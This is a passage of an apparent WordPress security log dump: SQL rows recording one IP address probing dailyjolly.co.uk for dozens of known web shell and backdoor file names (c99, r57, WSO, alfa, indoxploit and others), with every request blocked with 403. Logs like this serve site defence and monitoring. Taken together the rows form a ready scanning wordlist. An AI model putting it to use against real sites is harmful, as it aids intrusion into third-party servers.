Firefox\\/79.0\"}','a5fg7qNt28bnAMTm4PKwzGYH',0,1674797472.9490,283,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-content/plugins/seoplugin/db.php?u','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','UVIJSZmMsa50G8dqbjvRe3k4',0,1674797505.2168,614,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/installer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','2EQNcnMdWyh06wzUuHDIfX8a',0,1674797513.3221,370,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-admin/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QjhU4SP8aAyOzp7oZkR9gWcu',0,1674797748.2921,216,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/4price.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','97JurdcG4SjtebRILYTmzHA5',0,1674797751.0094,199,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-content/rss.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AJe0CTIPRfraSsxWDlpwoiLE',0,1674797759.2228,190,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-content/fx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2KzOw6MpnfbTHSAy4o1u5JI9',0,1674797760.8941,169,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-content/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','oLh8pkHyacw7r5Jb0l4jEtA6',0,1674797762.1918,173,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/1h6j5.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','e8ftsLoIvpOAkBDg6RPalGVF',0,1674797763.7895,169,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/WSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iG5wDx9yVaOHcEq4Bjm82oMJ',0,1674797765.1892,201,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-22.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','DC6zBXvSro0JLixeEhfm2YVp',0,1674797766.6314,170,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-content/themes/wp-pridmag/init.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QZfOpnlSK8ihzt7ucBJsTv3e',0,1674797769.3238,208,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','9GivolPqMZk7mygfF05rVctW',0,1674797771.1168,183,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','M7CIhTsmNkFrvO1H6SxW9LlP',0,1674797772.8394,178,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/idx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QUJAKFfNzsoBE2jbvY67VqMx',0,1674797773.9456,189,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/evil.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','y697lxCATYGLjIRZNh1qwV4J',0,1674797775.3358,228,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/marijuana.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','j16QrpcK5UuL2PO4v3fkE8Ya',0,1674797778.6815,209,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','s25q1JDAX9QpS4vwdIHPgoCm',0,1674797780.1949,175,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','l1aSh9tIYQonbjU3KLys82Wi',0,1674797785.2509,202,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/Priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ugh30JMjBSrpTGL1zIqFd6cv',0,1674797786.5849,221,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Mm72F9NWHrdGnKAkzsbejSZC',0,1674797789.6804,174,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/Priv.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','NUxZMgmGcprkwdz1tB3KDRTJ',0,1674797791.2901,182,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/indoxploit.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VH2poQU346EmRLdhY5gsBfxJ',0,1674797792.6121,171,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','3PZ6Q5KRAEJgDGsHCLk9W4uj',0,1674797796.7358,199,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','qOzels5vEfowiVDFG8BtxdCb',0,1674797799.0089,167,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-text/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nv45jBTRgue6zHMUZdpNAWwL',0,1674797800.3781,175,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-text/themes/seotheme/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','EvbC5BHWDhI4kGusOlmy1czg',0,1674797804.9171,206,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/r57.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PSnfKLQOj8sExN1IBFml7ikU',0,1674797806.2469,216,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/c100.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','bUQnEew8WTA90m5Y2N7Ou6Fr',0,1674797808.0083,171,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/sniper.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0QfjW4EdL17GFhoqwPcaiYSN',0,1674797810.1452,174,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QgJqx5EprXaMlonkewRObL76',0,1674797811.4747,180,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dLHrPGn964CwivK2SyYAlNeo',0,1674797812.9311,186,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/s.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','bmKyAOWVuLP3oxCazHTBgrt2',0,1674797814.4935,194,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/1975.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','njOC3FTE18tNXK05PgmzkSUM',0,1674797816.1655,181,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-2019.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dUWirZp4hc5HzM7DbYxOIy2v',0,1674797819.5914,191,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/h4xor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','MmwOx1GW23RokIXTNJpqbEdr',0,1674797821.0657,177,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wso24.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Sn9cNQLmY7R64xJFw10MiAfp',0,1674797821.9919,187,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/n.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kmbrs2F8gMzqTVe0jSlvZQxU',0,1674797823.1434,159,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/ae.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pnFHV4sjfZe72tCTqciYIJWD',0,1674797824.2357,197,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Nyw2h4xeafDcouA6mvGPKlbT',0,1674797825.6526,199,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BVWTXuzU2YblPA7MEN8swoZh',0,1674797827.0623,198,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5E8vGQSbZwhRocfq96102ueB',0,1674797828.2074,172,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5e8hItUKgbyjvNzl4ZmwnLq1',0,1674797831.2215,190,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gDnH5plV9ZiwkNoYhaPUq7fr',0,1674797833.2914,174,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/cpanel.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2JjIYGxN5egvsmDpWlfK08ki',0,1674797835.6978,163,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-text/fr.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','K8IxghsopALdyNGDYwMbj140',0,1674797836.9564,187,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','tWmU2HrCaKyi6Q3F8MwTAvXq',0,1674797838.4675,219,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/mm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','4z1Mrmoi8D2XvEUycfPwWtkR',0,1674797840.3579,174,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/blok.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','e7kHFMvIS23bs8wVjAh4fEDG',0,1674797841.2909,180,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/images/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Fta8er5kZPBsq4DGOLuVo0gM',0,1674797842.6818,205,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-admin/user/include.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','NFJWilG6XxdmtYho47Q9Kkyw',0,1674797843.9563,204,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-text/languages/plugins/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xE8h6p0SAb9WZPqnDMRNzXgT',0,1674797844.9709,212,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/modules/logo_img.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','m0RXwhM65OePv9AZDWzoxU4p',0,1674797846.4044,174,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/shells.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','UwF0kmsNJVBv65W2IxO19Rah',0,1674797847.3885,222,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','blx7SLT0YzgPfyF3GMD2KHQu',0,1674797848.3371,184,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/oc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Ccq8hgjLIeuz71pP2xFy4GUv',0,1674797849.4715,249,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','yepJbumD67nifWRkZK94BA8U',0,1674797850.8866,180,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','TkXrIQNJ0SdpjVKzv8U1otGW',0,1674797851.9255,187,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lzvSgxrKbEd37ZhIJ1ApjMHP',0,1674797853.0594,220,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','zdcmi8lxP7kRHtXfWjQw0rA4',0,1674797856.8638,181,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','EhKM5BYo4vcJFqCt2fDeuTj7',0,1674797860.9248,168,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1tmUN4T7fEJblChXnOQk9cSs',0,1674797863.5387,176,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','W9sZ531Y4JNVne8gbxmPCIaL',0,1674797865.1461,218,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ab0ErelMftFiXoks463gWNR8',0,1674797869.7419,184,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','mnr5VQjHUChzJuGSoaWAIyiO',0,1674797871.5844,203,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ZhN4AnvKJSf3XW9P7UxLcq1Y',0,1674797876.4122,178,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nXjkmNvuZYJFMe0B4oKPObyS',0,1674797879.4554,167,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OCT1uEvLR7rb6tegxj3ZkodH',0,1674797880.4931,167,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/archives.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','mLRNQtxW9g3esyJ7ToavcdUf',0,1674797881.5806,172,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','UqMLF06PZTIz5Nk7JCfRygEr',0,1674797882.6324,187,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-text/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1i0CkGbgP6KyuH9wNceU7R3p',0,1674797884.8286,183,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','7c9efb0Sz4At6yBLIvi1JgZl',0,1674797887.0558,168,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/olux.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8FJz5mCvH4pjtdOPST1f0xrl',0,1674797888.0248,166,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-text/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Vcp4hbjR1o9KyQS3rTIGZkHA',0,1674797889.7739,194,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/tuco.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','NziOqQtL4TCY9SGW5AldZxr7',0,1674797890.6564,165,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/l.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','qXwPAQpU46Sc7JoZWLM0Iy2l',0,1674797891.4336,251,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kn3ZXIANmdUOxY615BFWrfeK',0,1674797892.4434,180,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','DirtfSxYv2FO6ReMhqEGbl5I',0,1674797893.6210,170,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/shl.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','HzBYtEvbumiqRrTyWdjMNnF9',0,1674797894.5363,163,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8lgqKjJZ6Q9Uh5NGLAp1oc2I',0,1674797895.4938,195,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 